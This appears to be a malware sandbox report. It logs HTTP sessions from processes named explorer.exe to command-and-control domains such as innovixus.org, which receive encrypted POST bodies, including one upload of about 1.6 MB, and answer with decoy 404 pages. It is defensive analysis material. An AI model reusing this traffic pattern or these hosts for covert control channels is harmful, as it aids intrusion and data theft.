                                                                                                                                                              • qprhrbvyerftkiuy.com
                                                                                                                                                              • hnxigvehcemgn.org
                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              0192.168.11.204975085.192.60.190805064C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Nov 6, 2024 17:34:02.211380005 CET281OUTPOST /index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://jyevwpjwtgxg.net/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 183
                                                                                                                                                              Host: quantumqube.org
                                                                                                                                                              Nov 6, 2024 17:34:02.211380005 CET183OUTData Raw: 4f c3 54 7c 9e 09 58 0b 1f 02 2c ab 90 34 5d df 8a ca cb a7 b2 a7 8d 60 40 05 be 13 b2 6a bb 10 17 fb 1f 47 74 54 ce 66 f6 28 38 9c b5 3f 05 d3 50 35 86 f8 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 68 7b 05 d5 0d 11 fc 0e 48 94 90 67
                                                                                                                                                              Data Ascii: OT|X,4]`@jGtTf(8?P5Xc2]ainh{Hgx1ojoT!aJ4_~/zafH(Hn?Vpt,9K{-WVjTba
                                                                                                                                                              Nov 6, 2024 17:34:02.468101978 CET525INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.22.1
                                                                                                                                                              Date: Wed, 06 Nov 2024 16:34:02 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Data Raw: 31 35 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 [TRUNCATED]
                                                                                                                                                              Data Ascii: 150<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              1192.168.11.2049754150.241.91.218805064C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Nov 6, 2024 17:34:03.180044889 CET280OUTPOST /index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://dfeuyduiilfsy.com/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 351
                                                                                                                                                              Host: innovixus.org
                                                                                                                                                              Nov 6, 2024 17:34:03.180044889 CET351OUTData Raw: 4f c3 54 7c 9e 09 58 0b 1f 02 2c ab 90 34 5d df 8a ca cb a7 b2 a7 8d 60 40 05 be 13 b2 6a bb 10 17 fb 1f 47 74 54 ce 66 f6 28 38 9c b5 3f 05 d3 50 35 86 f8 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 68 7b 05 d5 0d 11 fc 0e 2a d8 9d 1e
                                                                                                                                                              Data Ascii: OT|X,4]`@jGtTf(8?P5Xc2]ainh{*,w/A\c80F9BktqD:EU .47?F=g@bgcS&h'SE-r;kBWX6v"lQj,O*qFU-)
                                                                                                                                                              Nov 6, 2024 17:34:03.466473103 CET1200INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.22.1
                                                                                                                                                              Date: Wed, 06 Nov 2024 16:34:03 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Data Raw: 31 66 37 30 0d 0a 40 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 27 d2 6c ac 11 c6 52 d1 3b 37 d7 a5 36 82 b4 8a ab 80 da 1b be 00 a0 92 05 00 03 0c a7 32 01 0b 00 00 07 00 9e 03 00 00 b5 20 7b d2 ef 60 5b 67 da 60 1b 3d 80 20 1b 00 d4 3b 60 b0 7e d3 97 67 4b b4 1e c8 ed d0 20 bd 40 8a 58 5a eb ae 80 2d 9e cf c7 d0 29 0e c6 49 d0 b1 bd fc 7c 8c 32 b9 fe 3b a4 e5 05 f8 a1 d8 93 b8 55 65 5f f6 fd bf 17 12 b5 95 6d ee d3 f9 dc bf 64 c8 bf a5 0e bc 88 69 71 5d 12 e7 ad 15 58 31 f3 00 a2 49 dd be 2f 03 19 38 61 a7 13 96 63 c1 ac 8c 15 ae 7e 4d 58 42 a0 42 de 02 9b ae 46 44 75 a6 d2 cc c4 71 aa 98 6b bb f3 ca 8f 07 91 15 bd f5 c5 2e 62 3e 55 21 50 56 9a 33 3b 60 ec 7d 95 25 68 a4 e5 90 29 9f be f2 65 92 3e e7 e3 41 0d d3 48 07 84 84 c1 bf d0 6d 40 cb aa 1f 68 8e 3d 9e a8 83 5a b2 b4 3c df fa 86 f8 87 68 16 51 ee 68 46 68 6d 62 d8 3d 26 f2 ae 17 92 e7 31 94 9e 14 71 df 56 4b 4d fb d1 eb eb 15 5f 59 75 b0 88 df 17 [TRUNCATED]
                                                                                                                                                              Data Ascii: 1f70@g@GHSN'E|6V#^.v'lR;762 {`[g`= ;`~gK @XZ-)I|2;Ue_mdiq]X1I/8ac~MXBBFDuqk.b>U!PV3;`}%h)e>AHm@h=Z<hQhFhmb=&1qVKM_Yu\ze"*x)]hS>+MiT"5V|<1FX*#WN3Ts`fe+l?4\y6,VRb783PrP/\->V\v'}yB*w\mf}(D'jHid`F&4F3a@nE56t9bGY:8|_>p["N{bhd]"1NdAjdqKrM!6k7|.ip+EM>#Fv(tx1C Q[R<CjI<S[~N<h'3T>5U[;bs!_;b3W&eM?pHk_Z9hfKi>iox YSviY:^x00G:hb,Y1y~D2G))w%<_?hHcfy{|Ri%IM5!/[soZAJaOI-`wElZk0RV?W [TRUNCATED]
                                                                                                                                                              Nov 6, 2024 17:34:03.466816902 CET1200INData Raw: fb ec ad 77 53 0c e4 27 74 a7 92 ff f9 24 7c 4d ef 8c 80 ca 79 44 6a 09 76 c8 b2 1f 8c 57 4c 9d d5 de 98 0b 6e 3f 50 a4 61 3c b2 20 11 d1 6f f7 32 9c fb a5 2a 17 ed 4b dd 10 fd 41 aa e5 e0 1f 23 33 fc 32 70 3b 9d 4c cd 57 7a 03 98 ef 9a 40 22 85
                                                                                                                                                              Data Ascii: wS't$|MyDjvWLn?Pa< o2*KA#32p;LWz@"V}qq.Rnp0c{s#hzd-i;W9'A8.FnM3n#)T'B6MVO/=l*HW60pm&T^D
                                                                                                                                                              Nov 6, 2024 17:34:03.466836929 CET1200INData Raw: f6 02 4a fa 12 81 57 fd c8 10 63 2b 53 49 7b b5 f2 45 6d 62 92 11 80 48 fc b5 7e 00 ed 2e 1b f5 27 aa f2 f9 47 fc c4 fa 28 85 e4 e6 09 cc e0 91 72 22 9f 3f a8 73 36 00 93 4f 0f 1e eb 7f aa e3 ec bf 15 71 da c1 2a 27 5e d6 82 5d d7 c8 c5 29 86 fe
                                                                                                                                                              Data Ascii: JWc+SI{EmbH~.'G(r"?s6Oq*'^])Ed{ke&#L*X|H4'|M,+?y;rEyKz)ZF#>O0,O:e'UR2e9^&%9})B#"*T`kSE]u!-)
                                                                                                                                                              Nov 6, 2024 17:34:03.466851950 CET1200INData Raw: 8f db 97 82 dc 60 4e a8 f1 4e 15 c3 1e 4e 17 ea ad 7d 3d 43 b3 65 73 72 2c b8 6d 19 d4 0b 42 6b 50 52 74 19 25 82 5a c2 b1 ff 8d 83 c3 93 9d 90 93 63 57 eb 35 be 92 01 23 75 f8 e4 aa 99 68 96 9c 75 b4 a7 5e c2 55 07 65 fd 2f db 0d 25 c9 c8 ea 01
                                                                                                                                                              Data Ascii: `NNN}=Cesr,mBkPRt%ZcW5#uhu^Ue/%9K5|'x._[[j=Li-5hTC03&H=2b.(QL]rp9B'Q]3^e{eO^SE0\Q)gifyFUG
                                                                                                                                                              Nov 6, 2024 17:34:03.466944933 CET1200INData Raw: 67 d4 0c b9 4b 81 85 a5 36 55 11 b8 8b 65 2a 37 fa 14 05 53 06 d0 27 e6 fb ca 24 9e 15 e7 95 58 d4 4c b9 8d 8e 48 de c8 e9 0d 42 e9 82 00 94 d0 c7 dc 15 e9 da 76 4d 74 38 33 3c 9b a0 21 92 c4 fd 53 a1 f3 0a bd 2e 6a 6b 16 84 07 a4 d6 d7 c5 26 bb
                                                                                                                                                              Data Ascii: gK6Ue*7S'$XLHBvMt83<!S.jk&*w{T4g=@2Vabmr92`OH))D/l: U/GFBA.(1yC5~I\G4-Yfg%>cb >I%z_,?05
                                                                                                                                                              Nov 6, 2024 17:34:03.466964006 CET1200INData Raw: 89 36 91 29 15 3c de bc e1 4d 61 63 a3 1f d4 de d7 f9 26 d3 d5 bd 08 f9 41 d1 d6 7e d6 76 c3 77 8d c9 a8 e6 c6 0b f9 c5 3a b5 64 a4 49 c0 df 98 6a 80 87 fe ae 48 cf 82 3f 80 8b b8 30 3a 33 3d a1 66 55 4c 37 e8 1b 1d fc 4c b7 f9 52 dc a9 66 7e 6b
                                                                                                                                                              Data Ascii: 6)<Mac&A~vw:dIjH?0:3=fUL7LRf~kF%Oi'O|PwLtq3*_n5EG)<@[y<b'C$A^y=|g}DI7ggdNb@xNlG}kwKYhP0|r{X
                                                                                                                                                              Nov 6, 2024 17:34:03.466979027 CET1200INData Raw: a2 76 95 51 97 8b c8 73 31 27 84 04 e7 9f 19 bf da 72 dd f1 61 c7 2a 6b d0 6e 4b 95 fe 95 13 46 cc ef 55 ec e9 d0 19 5b d6 3e 83 17 4f 55 a8 40 9c 38 5c ed e7 74 cb 3b 5f 0f 11 a3 60 e4 32 ad cc 07 79 c0 35 ab 50 87 e6 09 68 52 a4 08 61 fc dc d2
                                                                                                                                                              Data Ascii: vQs1'ra*knKFU[>OU@8\t;_`2y5PhRafEO-9d]jDuT@/F]*Lux\]Q,-Z&-I+nkP&22WV%I&Ox&\D.JRwgqy60UZ
                                                                                                                                                              Nov 6, 2024 17:34:03.466994047 CET1200INData Raw: 70 e7 ad 8c 32 58 1e 56 0d 89 88 ce 4f 7d 28 75 c1 b4 f4 06 7e c3 82 5d 02 f1 40 4e be 27 f3 17 b2 ce 02 75 28 f6 29 db df de f4 c0 02 d5 a3 89 26 04 8f 4b 1b f6 00 e8 2e 41 87 80 ce 98 e1 74 36 99 6d f0 ec aa 16 ba 21 55 9a 0e af 57 42 18 9d 2a
                                                                                                                                                              Data Ascii: p2XVO}(u~]@N'u()&K.At6m!UWB*GTE#d>JnF6/I.[pFdp5e)MV5IVYhn6&L/|aRYK&gbx?r_z4*,53Di%@-~b"M]|
                                                                                                                                                              Nov 6, 2024 17:34:03.467008114 CET1200INData Raw: 3e 34 d6 cc 33 ca e8 e9 19 59 57 af 02 5b ab d8 e4 52 a0 2d ee e0 a0 fc f8 a1 ac 34 9e 83 75 e9 27 00 80 16 da 3b 34 e0 cb 74 2b 00 9d da b0 b6 62 f4 65 c9 95 e0 5c 27 fe 61 56 02 44 7e f7 d3 b6 94 aa f4 6b 7e 66 45 c3 a6 b2 a7 25 32 c9 f4 aa fb
                                                                                                                                                              Data Ascii: >43YW[R-4u';4t+be\'aVD~k~fE%2D"-GUhX#T]wl<|zz`mS)0&r-E>E^.]2)*f'\8._H6(+BmJ$\l%2V
                                                                                                                                                              Nov 6, 2024 17:34:03.467113018 CET1200INData Raw: 4f e5 5c 4d d0 43 3e 3c 48 96 f9 97 a9 46 2f 2a e8 96 4a b7 cc d0 f4 e2 76 b1 0b 77 37 75 23 56 4d 53 40 16 36 71 48 43 eb 1d 96 af bb 58 62 59 93 4a 0f c9 79 d6 58 b8 a0 b9 6c 52 6e 63 2f ed a5 10 04 65 1d 19 c0 34 a0 0b 1b 69 d4 cf 45 dc f3 e7
                                                                                                                                                              Data Ascii: O\MC><HF/*Jvw7u#VMS@6qHCXbYJyXlRnc/e4iEZ4F"Y|FsBH;n0CH]_o]d$5dF#zJ\qNfYS>lSS*2soIb|:3I\F4#^>WSU#8-4;X]"J


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              2192.168.11.2049756150.241.91.218804176C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Nov 6, 2024 17:34:06.875663042 CET277OUTPOST /index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://innovixus.org/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 3441
                                                                                                                                                              Host: innovixus.org
                                                                                                                                                              Nov 6, 2024 17:34:06.875663042 CET1200OUTData Raw: 4f c3 54 7c 9e 09 58 0b 1f 02 2c ab 90 34 5d df 8a ca cb a7 b2 a7 8d 60 40 05 be 13 b2 6a bb 10 17 fb 1f 47 74 54 ce 66 f6 28 38 cb 84 0f 33 e7 0f 05 b5 f8 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 41 1e 61 6c 6e 68 7b 05 d5 0c 11 fc 0e 53 a0 f3 0e
                                                                                                                                                              Data Ascii: OT|X,4]`@jGtTf(83Xc2]Aalnh{SV4jpu]OPmDwV1:HI&g(q,(A7fSr7(Lh#;-V8y'z$7/j[=;0u75Qk
                                                                                                                                                              Nov 6, 2024 17:34:06.875735998 CET2241OUTData Raw: 32 db b3 17 08 31 74 43 3d f4 57 ce ac 92 a1 db e2 e8 8b eb e5 12 57 76 c5 dc 9f 0c 83 f7 5e 06 22 46 56 b9 ac 04 ff 5e e7 99 e5 a6 ae 90 04 0d d8 f2 8b b7 36 92 e5 bc c9 ef 9d 11 3c fa 19 f6 f2 97 00 98 29 26 8e e0 67 de 09 96 53 79 03 9e c9 24
                                                                                                                                                              Data Ascii: 21tC=WWv^"FV^6<)&gSy$xbz1KJ[H+NBJ0^3-TSO7/Q5-[X'!tf)7#Hn ]FaAr,qVa@"{1'}NF&Ji:b<GxkTW
                                                                                                                                                              Nov 6, 2024 17:34:07.135812044 CET525INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.22.1
                                                                                                                                                              Date: Wed, 06 Nov 2024 16:34:07 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Data Raw: 31 35 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 [TRUNCATED]
                                                                                                                                                              Data Ascii: 150<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              3192.168.11.2049757150.241.91.218806212C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Nov 6, 2024 17:34:21.478322029 CET280OUTPOST /index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://innovixus.org/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 1605113
                                                                                                                                                              Host: innovixus.org
                                                                                                                                                              Nov 6, 2024 17:34:21.478542089 CET2578OUTData Raw: 4f c3 54 7c 9e 09 58 0b 1f 02 2c ab 90 34 5d df 8a ca cb a7 b2 a7 8d 60 40 05 be 13 b2 6a bb 10 17 fb 1f 47 74 54 ce 66 f6 28 38 cb 84 0f 33 e7 0f 05 b5 f8 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 41 1e 61 61 6e 68 7b 05 d5 0c 11 fc 0e 3e a4 cd 0b
                                                                                                                                                              Data Ascii: OT|X,4]`@jGtTf(83Xc2]Aaanh{>U4#hYTC'U<E9sNeDq69Jl.z]u1d-S#h j8T;{-z$/?T.0%vc.f<%w
                                                                                                                                                              Nov 6, 2024 17:34:21.478615046 CET9023OUTData Raw: 2e 5e e6 ae dc 92 92 08 54 03 20 83 12 f2 1f bf 45 0c 75 cc b4 77 90 5b 28 6c d0 71 2f ee 4b 8f 6f f5 1c 67 6c 00 3a 27 cf 80 3d ef 8c 87 da 4d f5 cc d6 36 18 fd 9c 3f 7b ea 15 72 75 99 96 94 eb 9a 09 57 b4 6a ef d5 99 ae a9 6a 03 19 7f 88 c8 ab
                                                                                                                                                              Data Ascii: .^T Euw[(lq/Kogl:'=M6?{ruWjjkxRj\"^kPbxCGqR`<zc[BwARt<I[5N(Yi7N1c8.v?KR_p$}_RtADabSVX}%gZ^K*[n
                                                                                                                                                              Nov 6, 2024 17:34:21.666868925 CET348INHTTP/1.1 413 Request Entity Too Large
                                                                                                                                                              Server: nginx/1.22.1
                                                                                                                                                              Date: Wed, 06 Nov 2024 16:34:21 GMT
                                                                                                                                                              Content-Type: text/html
                                                                                                                                                              Content-Length: 183
                                                                                                                                                              Connection: close
                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 31 33 20 52 65 71 75 65 73 74 20 45 6e 74 69 74 79 20 54 6f 6f 20 4c 61 72 67 65 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 31 33 20 52 65 71 75 65 73 74 20 45 6e 74 69 74 79 20 54 6f 6f 20 4c 61 72 67 65 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 32 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                              Data Ascii: <html><head><title>413 Request Entity Too Large</title></head><body><center><h1>413 Request Entity Too Large</h1></center><hr><center>nginx/1.22.1</center></body></html>
                                                                                                                                                              Nov 6, 2024 17:34:21.667038918 CET1289OUTData Raw: ab 4c 74 79 ae cf 03 fd 64 46 15 5a e7 36 5b 9f b6 d1 bf 57 9a f8 18 ed 50 7f e9 49 af 94 a7 7b 2d 2e 1a 85 b1 e1 f8 1d a1 1a 95 1b c7 9d fc 74 09 90 4d b5 f0 8b 4b 2b 87 10 c0 9e 19 ed 45 86 22 eb 4d fd 47 fe 16 c2 fd 91 6e 45 71 e5 0b ed 21 91
                                                                                                                                                              Data Ascii: LtydFZ6[WPI{-.tMK+E"MGnEq!7|gy)@LZ3SOF}sJ[f{KB6p?TYle6H)~+YWpXF {^xy_;8GQ/hBR_B:
                                                                                                                                                              Nov 6, 2024 17:34:21.667216063 CET11601OUTData Raw: a7 6f 0d 68 ec 0e 49 aa 77 61 ed 74 ab 69 70 45 e9 15 60 03 d7 09 c9 43 41 1f 5a 3e 87 cb 6d 4a b6 04 6e 4c 8e 32 48 93 2b 79 05 3f f0 dd be 16 19 e0 cb d8 d9 f4 61 a6 56 d5 c4 bd a4 49 f7 08 54 db 3f 0d 7c a8 e2 0d d8 42 62 3c bf dd 95 55 a0 da
                                                                                                                                                              Data Ascii: ohIwatipE`CAZ>mJnL2H+y?aVIT?|Bb<UZyo+w1_eAy X >zSDl;pDwHoM--"qL.8$%pHo5Oc_>bb~un#g`& fXqbc EPZMEh9vml^=ksk^L7
                                                                                                                                                              Nov 6, 2024 17:34:21.667382956 CET1289OUTData Raw: 58 82 c3 34 ee 06 2f f0 71 88 2f af 33 bc 0f 75 b5 99 d3 bc 8c 8b 0d de f7 71 1c e2 7d 0b 05 a2 f2 c4 ac f7 53 43 d0 1d 44 18 1d 25 35 78 1d aa 99 d2 34 cb 11 0d 9b 2a c1 0b 02 ae 02 62 79 79 34 6c 2d 70 ac 84 42 45 8f 88 b2 88 c2 41 fe bb 25 e0
                                                                                                                                                              Data Ascii: X4/q/3uq}SCD%5x4*byy4l-pBEA%p%3_6[3m*,z \Za48HMOYE9&5gtbL<=}y6W-VbF>/TuKIYHq|=Ec{[/cq;'r-R7+#
                                                                                                                                                              Nov 6, 2024 17:34:21.667938948 CET2578OUTData Raw: 2c ab fc c0 5e a7 5b bf e1 ca 71 7e d8 ad 2f 3c 0e 08 7a 7f 66 d6 cc ce 50 fd c0 7e 8e ca 2c 56 9e 10 ed cf e7 a2 e5 17 b9 70 90 47 75 a2 3b ba 13 4d af 88 2c 64 da 69 94 e9 2e 7f 8f f7 cc 72 8a a9 8f eb 77 bd 30 33 e1 8a 74 eb 22 86 88 f0 d6 4a
                                                                                                                                                              Data Ascii: ,^[q~/<zfP~,VpGu;M,di.rw03t"Jf'u_( s6h^u3-8K/a.Bc-8VzfJ=d&9}Ud;4|d,gK}+2dTBjxw3F,QYD"jm6sQy_
                                                                                                                                                              Nov 6, 2024 17:34:21.668114901 CET7734OUTData Raw: 90 40 b8 aa a7 fe fc 7b 1d 56 87 1c 4a c3 cf 55 ee 76 c9 88 fd ff bb a0 30 56 ae 0a a5 ed 3d b8 08 53 86 ee 4e d1 df b2 29 6d 2c 97 3f 6b 4b 57 4e 6a 98 7b ca 81 f5 8c 3e 88 18 a6 cb 0c da c6 44 a8 a4 ef 2d dd 3e 81 6a 7d 09 2e 49 bc 11 57 8b 16
                                                                                                                                                              Data Ascii: @{VJUv0V=SN)m,?kKWNj{>D->j}.IWu^\2M*cRRT>+T=O-DVd}>2gN,1v(@<2#:\gUurg7}oUDY*xXDJe%{/+&|{
                                                                                                                                                              Nov 6, 2024 17:34:21.856399059 CET2578OUTData Raw: 27 0b 74 a4 0d 5d 70 19 d6 76 80 94 d6 3e f7 39 4e 3e 9d 02 54 3f 17 25 45 03 8e e9 08 db ca 98 de cd 72 3d 2a 79 60 93 4a 0c 16 f7 49 60 26 20 dc 20 32 ed 60 6c 25 65 28 0b dd 9f d9 05 7e 15 72 c5 57 95 ff ab b3 43 d2 c5 75 d3 d9 e7 fc 78 f6 d5
                                                                                                                                                              Data Ascii: 't]pv>9N>T?%Er=*y`JI`& 2`l%e(~rWCuxxo5LxZ"`%}0[R|JeontF6+?sIvO8\z n}jf9Pt3&b/QSK*UEo/HyA#A-[5iZ`+),C
                                                                                                                                                              Nov 6, 2024 17:34:21.856585979 CET23202OUTData Raw: cb a5 a2 84 41 56 55 10 89 94 a9 9f 71 00 a4 cf a0 5f cb fe 6a 09 be 67 63 cc bc 33 10 f9 36 49 4d cc 0a b6 14 b9 e6 40 76 b4 7e 0f 5f dc 83 0e af b6 99 88 81 cc 20 18 27 cb 94 59 28 8d 63 7e ed 4a e3 ca 34 f4 33 13 28 8d 69 49 04 e1 85 39 00 9f
                                                                                                                                                              Data Ascii: AVUq_jgc36IM@v~_ 'Y(c~J43(iI9Mu\F3.lw_y_oc{7'Y-Vo'Dk?vuE1')G$=D.Z{RrrNuPAvz*F.TW*HG?uJ'&Q&g~_,v
                                                                                                                                                              Nov 6, 2024 17:34:21.856734991 CET12890OUTData Raw: 97 f9 4c 28 7a c6 6b b0 69 b6 0f 87 d3 35 2c 16 a9 b4 a9 49 2a 2c d1 1c be cf 0c 7b 51 47 86 dc a0 f3 4a 00 73 94 7d 99 6b 5c 7a 0a d2 a1 ca 21 44 11 50 3d 7e da b5 13 d9 50 2b 9e 65 55 7c 6f 21 dd 4d ee b1 52 57 98 56 66 33 e5 50 93 cb 60 db 9f
                                                                                                                                                              Data Ascii: L(zki5,I*,{QGJs}k\z!DP=~P+eU|o!MRWVf3P`X7&3R:p>v_)}.\h2A/>{\cGS.<,@:KujBPi[#y t->d8BG|Y1


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              4192.168.11.2049758150.241.91.218805064C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Nov 6, 2024 17:35:16.714895010 CET282OUTPOST /index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://lnnmtmdpxvygnco.net/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 109
                                                                                                                                                              Host: innovixus.org
                                                                                                                                                              Nov 6, 2024 17:35:16.714895010 CET109OUTData Raw: 4f c3 54 7c 9e 09 58 0b 1f 02 2c ab 90 34 5d df 8a ca cb a7 b2 a7 8d 60 40 05 be 13 b2 6a bb 10 17 fb 1f 47 74 54 ce 66 f6 28 38 9c b5 3f 05 d3 50 35 86 f8 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 69 7b 05 d5 0d 11 fc 0e 09 d4 8c 7f
                                                                                                                                                              Data Ascii: OT|X,4]`@jGtTf(8?P5Xc2]aini{ "G"I\w1$O4
                                                                                                                                                              Nov 6, 2024 17:35:16.974730968 CET235INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.22.1
                                                                                                                                                              Date: Wed, 06 Nov 2024 16:35:16 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Data Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 2f+g@GHSN'E|6V#^.v0


